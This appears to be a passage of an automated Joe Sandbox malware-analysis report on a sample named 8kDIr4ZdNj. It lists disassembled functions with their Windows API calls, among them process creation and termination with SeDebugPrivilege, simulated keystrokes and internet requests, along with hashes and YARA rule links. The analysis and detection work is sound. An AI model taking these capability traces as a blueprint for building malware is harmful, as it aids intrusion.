                                                                        • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                                        • String ID:
                                                                        • API String ID: 2603140658-3916222277
                                                                        • Opcode ID: 09034c2bd15ce95c40f393f29cd9a332f71d0ed2f575b10b4bd373fd252f4244
                                                                        • Instruction ID: 53ad17b3669302890e545cfbb519a82cdb10cf6f093753586bc16f9f9fdd62ca
                                                                        • Opcode Fuzzy Hash: 09034c2bd15ce95c40f393f29cd9a332f71d0ed2f575b10b4bd373fd252f4244
                                                                        • Instruction Fuzzy Hash: 73415CB1601218BFEB129F50CC99FFB7BACEF08354F00812AF9059A195E7749E449BA4
                                                                        Function 00908C46 Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0091F910), ref: 00908D28
                                                                        • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0091F910), ref: 00908D5C
                                                                        • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00908ED6
                                                                        • SysFreeString.OLEAUT32(?), ref: 00908F00
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                        • String ID:
                                                                        • API String ID: 560350794-0
                                                                        • Opcode ID: edcdd42cbf89bab30ce86bf12865859e109c48dc0846fd3a5e067c69a2029aed
                                                                        • Instruction ID: b833199c9fdf6ea328e82b6ada10e8f50c7d0d9d322f9ead6a9345c23e37ce53
                                                                        • Opcode Fuzzy Hash: edcdd42cbf89bab30ce86bf12865859e109c48dc0846fd3a5e067c69a2029aed
                                                                        • Instruction Fuzzy Hash: 91F13B71A00219EFDF14EF98C884EAEB7B9FF45314F148498F945AB291DB31AE46CB50
                                                                        Function 0090F694 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 0090F6B5
                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0090F848
                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0090F86C
                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0090F8AC
                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0090F8CE
                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0090FA4A
                                                                        • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0090FA7C
                                                                        • CloseHandle.KERNEL32(?), ref: 0090FAAB
                                                                        • CloseHandle.KERNEL32(?), ref: 0090FB22
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                        • String ID:
                                                                        • API String ID: 4090791747-0
                                                                        • Opcode ID: 3142b957d92f5ff490fb07705636618369f03b9c3ff5db83d90828590ca7ac1c
                                                                        • Instruction ID: ae109f6e1619b4f7efe31a916429894ef75f31da09eb2252d34566aee038a261
                                                                        • Opcode Fuzzy Hash: 3142b957d92f5ff490fb07705636618369f03b9c3ff5db83d90828590ca7ac1c
                                                                        • Instruction Fuzzy Hash: 8CE1C3312043009FCB24EF28C491B6ABBE5FF85354F18896DF8999B6A2DB30DD45CB52
                                                                        Function 008F4CC1 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 008F466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,008F3697,?), ref: 008F468B
                                                                          • Part of subcall function 008F466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,008F3697,?), ref: 008F46A4
                                                                          • Part of subcall function 008F4A31: GetFileAttributesW.KERNEL32(?,008F370B), ref: 008F4A32
                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 008F4D40
                                                                        • _wcscmp.LIBCMT ref: 008F4D5A
                                                                        • MoveFileW.KERNEL32(?,?), ref: 008F4D75
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                        • String ID:
                                                                        • API String ID: 793581249-0
                                                                        • Opcode ID: 2c69cec17f51469b3e6d7c60800701a828d63ce4825d07b1804ad9bd4c19e6c5
                                                                        • Instruction ID: 0a4c56bc98863c417c612913c385d56fe73bd8daebec099de7aef892b7a42247
                                                                        • Opcode Fuzzy Hash: 2c69cec17f51469b3e6d7c60800701a828d63ce4825d07b1804ad9bd4c19e6c5
                                                                        • Instruction Fuzzy Hash: 405143B21083499BC725EB64D8819EB77ECFF84350F10192FF289D3152EE34A688C766
                                                                        Function 00918645 Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 009186FF
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: InvalidateRect
                                                                        • String ID:
                                                                        • API String ID: 634782764-0
                                                                        • Opcode ID: 51e0e0c6f584655693fdf10be31df02e1d6cb73bfec073738fd08ac489a9ec03
                                                                        • Instruction ID: 3da641ca0a46ee88d57ef981af53864a87b5c058086e4cde47bef200f760c394
                                                                        • Opcode Fuzzy Hash: 51e0e0c6f584655693fdf10be31df02e1d6cb73bfec073738fd08ac489a9ec03
                                                                        • Instruction Fuzzy Hash: 2A518F3071424CBEEF209B288C85FEA7BA9FB05360F704615F925E61E1DB75A9C0EB51
                                                                        Function 00892B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 008CC2F7
                                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 008CC319
                                                                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 008CC331
                                                                        • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 008CC34F
                                                                        • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 008CC370
                                                                        • DestroyIcon.USER32(00000000), ref: 008CC37F
                                                                        • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 008CC39C
                                                                        • DestroyIcon.USER32(?), ref: 008CC3AB
                                                                          • Part of subcall function 0091A4AF: DeleteObject.GDI32(00000000), ref: 0091A4E8
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                        • String ID:
                                                                        • API String ID: 2819616528-0
                                                                        • Opcode ID: 43c3d10df7839a3e679a583f5d861ae7f80024866fb1b89d490a16d0e9c4e80b
                                                                        • Instruction ID: 7d044fb988f2607fc83b926140939cf37b424981799bed42a6c56689c0fedeba
                                                                        • Opcode Fuzzy Hash: 43c3d10df7839a3e679a583f5d861ae7f80024866fb1b89d490a16d0e9c4e80b
                                                                        • Instruction Fuzzy Hash: 02512570610209AFDB20EF65DC55FAA7BB5FB58324F144528F906D72A0D770E990EB50
                                                                        Function 008E966E Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 008EA82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 008EA84C
                                                                          • Part of subcall function 008EA82C: GetCurrentThreadId.KERNEL32 ref: 008EA853
                                                                          • Part of subcall function 008EA82C: AttachThreadInput.USER32(00000000,?,008E95BA,?,00000001), ref: 008EA85A
                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 008E968E
                                                                        • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 008E96AB
                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 008E96AE
                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 008E96B7
                                                                        • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 008E96D5
                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 008E96D8
                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 008E96E1
                                                                        • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 008E96F8
                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 008E96FB
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                        • String ID:
                                                                        • API String ID: 2014098862-0
                                                                        • Opcode ID: 66825e8eea98f3f7eb6a181f9859f9d56327c7dc336ae192eb37666fb03c0dfa
                                                                        • Instruction ID: d8a69c40374f5a398fc4fd6457e94fdd0b3b1dd649cfc835061daeaf5c001d77
                                                                        • Opcode Fuzzy Hash: 66825e8eea98f3f7eb6a181f9859f9d56327c7dc336ae192eb37666fb03c0dfa
                                                                        • Instruction Fuzzy Hash: F711E571A2461CBEF7106F65DC49FAA3F1DEB4D795F104425F244AB0A0C9F25C10EAA4
                                                                        Function 008E8921 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,008E853C,00000B00,?,?), ref: 008E892A
                                                                        • HeapAlloc.KERNEL32(00000000,?,008E853C,00000B00,?,?), ref: 008E8931
                                                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,008E853C,00000B00,?,?), ref: 008E8946
                                                                        • GetCurrentProcess.KERNEL32(?,00000000,?,008E853C,00000B00,?,?), ref: 008E894E
                                                                        • DuplicateHandle.KERNEL32(00000000,?,008E853C,00000B00,?,?), ref: 008E8951
                                                                        • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,008E853C,00000B00,?,?), ref: 008E8961
                                                                        • GetCurrentProcess.KERNEL32(008E853C,00000000,?,008E853C,00000B00,?,?), ref: 008E8969
                                                                        • DuplicateHandle.KERNEL32(00000000,?,008E853C,00000B00,?,?), ref: 008E896C
                                                                        • CreateThread.KERNEL32(00000000,00000000,008E8992,00000000,00000000,00000000), ref: 008E8986
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                        • String ID:
                                                                        • API String ID: 1957940570-0
                                                                        • Opcode ID: dbefe2cfe610e886dd99935a02cb428ab2ad0cabb1f0e193e587eba21cdb545b
                                                                        • Instruction ID: c21fa9382eb0ada00562b8e312bb5585438de091693300df036637288b7c374f
                                                                        • Opcode Fuzzy Hash: dbefe2cfe610e886dd99935a02cb428ab2ad0cabb1f0e193e587eba21cdb545b
                                                                        • Instruction Fuzzy Hash: E601BFB5754348FFE710ABA5DC4DFAB3B6CEB89711F408421FA05DB191CA749800DB20
                                                                        Function 00909B23 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: NULL Pointer assignment$Not an Object type
                                                                        • API String ID: 0-572801152
                                                                        • Opcode ID: c4e488417b9cfa2e63eb5dca94b33da57c90e75e2846cb2542d296a7fa1da816
                                                                        • Instruction ID: 639d0b771e91e6bbdab158a452c85091d79093d53d30837d18c4a79481d408e9
                                                                        • Opcode Fuzzy Hash: c4e488417b9cfa2e63eb5dca94b33da57c90e75e2846cb2542d296a7fa1da816
                                                                        • Instruction Fuzzy Hash: 2AC19271A0021A9FDF10DF58D884BAEB7F9FB48314F148469E949E72C2E7709D45CB90
                                                                        Function 00909113 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$ClearInit$_memset
                                                                        • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                        • API String ID: 2862541840-625585964
                                                                        • Opcode ID: d5345f178083b8076e8dedffff096c283ffee850751a853a86b487e862a1e466
                                                                        • Instruction ID: b7b3e4fefcdacaeec537ff8c7c9a6b5475d54378d9f75ea0a5a550b3f3327844
                                                                        • Opcode Fuzzy Hash: d5345f178083b8076e8dedffff096c283ffee850751a853a86b487e862a1e466
                                                                        • Instruction Fuzzy Hash: 5D917871A00219AFDF24DFA9C848EAFBBB8EF85714F108559F515AB2D2D7709900CFA0
                                                                        Function 0090975D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 008E710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,008E7044,80070057,?,?,?,008E7455), ref: 008E7127
                                                                          • Part of subcall function 008E710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,008E7044,80070057,?,?), ref: 008E7142
                                                                          • Part of subcall function 008E710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,008E7044,80070057,?,?), ref: 008E7150
                                                                          • Part of subcall function 008E710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,008E7044,80070057,?), ref: 008E7160
                                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00909806
                                                                        • _memset.LIBCMT ref: 00909813
                                                                        • _memset.LIBCMT ref: 00909956
                                                                        • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00909982
                                                                        • CoTaskMemFree.OLE32(?), ref: 0090998D
                                                                        Strings
                                                                        • NULL Pointer assignment, xrefs: 009099DB
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                        • String ID: NULL Pointer assignment
                                                                        • API String ID: 1300414916-2785691316
                                                                        • Opcode ID: 2b36832c643c5c21f2b9eb531bef7b341ea57269c74f2ec4a4e9a4834432725d
                                                                        • Instruction ID: 954e79601456fc2817db92581ef631dd28acea14907637ee6359b549e603cbcb
                                                                        • Opcode Fuzzy Hash: 2b36832c643c5c21f2b9eb531bef7b341ea57269c74f2ec4a4e9a4834432725d
                                                                        • Instruction Fuzzy Hash: BD912671900229EBDF10EFA5DC40EDEBBB9FF49310F104159F519A7281EB319A44CBA1
                                                                        Function 00916D80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00916E24
                                                                        • SendMessageW.USER32(?,00001036,00000000,?), ref: 00916E38
                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?,?,008CCC6D,?,?,?,?), ref: 00916E52
                                                                        • _wcscat.LIBCMT ref: 00916EAD
                                                                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 00916EC4
                                                                        • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00916EF2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Window_wcscat
                                                                        • String ID: SysListView32
                                                                        • API String ID: 307300125-78025650
                                                                        • Opcode ID: 83f0f0c676882865dd79c4f5d882ee4e213f4a162987a5fce89b4b36de379377
                                                                        • Instruction ID: a761b84278900141235d444bc97ce184eda10a4d546acfe2dd519bcc17acc24c
                                                                        • Opcode Fuzzy Hash: 83f0f0c676882865dd79c4f5d882ee4e213f4a162987a5fce89b4b36de379377
                                                                        • Instruction Fuzzy Hash: C541AD74A0030CABEB21DF64CC85BEA77E8EF08354F10452AF985E7292D6729D84CB60
                                                                        Function 0090E933 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 008F3C55: CreateToolhelp32Snapshot.KERNEL32 ref: 008F3C7A
                                                                          • Part of subcall function 008F3C55: Process32FirstW.KERNEL32(00000000,?), ref: 008F3C88
                                                                          • Part of subcall function 008F3C55: CloseHandle.KERNEL32(00000000), ref: 008F3D52
                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0090E9A4
                                                                        • GetLastError.KERNEL32 ref: 0090E9B7
                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0090E9E6
                                                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 0090EA63
                                                                        • GetLastError.KERNEL32(00000000), ref: 0090EA6E
                                                                        • CloseHandle.KERNEL32(00000000), ref: 0090EAA3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                        • String ID: SeDebugPrivilege
                                                                        • API String ID: 2533919879-2896544425
                                                                        • Opcode ID: c80b91bb31542de36b1c0091fe76e898f1accf5c1efa99f7f51521b6e7e4c3e5
                                                                        • Instruction ID: 93ff7c26290b25d465ac426ca5959882e32d1dd80081f5bad9c7d68b5ae86caa
                                                                        • Opcode Fuzzy Hash: c80b91bb31542de36b1c0091fe76e898f1accf5c1efa99f7f51521b6e7e4c3e5
                                                                        • Instruction Fuzzy Hash: 2B4176313042049FDB15EF28CCA5BAEB7A5FF45314F18882CF9469B2D2DB74A804CB92
                                                                        Function 008F2F94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LoadIconW.USER32(00000000,00007F03), ref: 008F3033
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: IconLoad
                                                                        • String ID: blank$info$question$stop$warning
                                                                        • API String ID: 2457776203-404129466
                                                                        • Opcode ID: 6ee268a1018e4fb30d76f4a022b64ee776d9bd37ad314738609615e84709956a
                                                                        • Instruction ID: b7efdfd33970b4a683caf40b1a183b26e0952ebb64e32b353f9b48d950bdf4d4
                                                                        • Opcode Fuzzy Hash: 6ee268a1018e4fb30d76f4a022b64ee776d9bd37ad314738609615e84709956a
                                                                        • Instruction Fuzzy Hash: 8C11D831348B8EBEE7159A69DC42CBF779CFF55364B20006BFB00E6282DE619F4055A5
                                                                        Function 008C97FC Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 71memoryfileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetProcessHeap.KERNEL32(00000008,00001000,?,?,?,?,?,0091FB24,00000001,00000000,?,?,008C8249,0091FB24,0000000C,00000080), ref: 008C980B
                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,0091FB24,00000001,00000000,?,?,008C8249,0091FB24,0000000C,00000080), ref: 008C9812
                                                                          • Part of subcall function 008B8B28: __getptd_noexit.LIBCMT ref: 008B8B28
                                                                        • __lseeki64_nolock.LIBCMT ref: 008C98D6
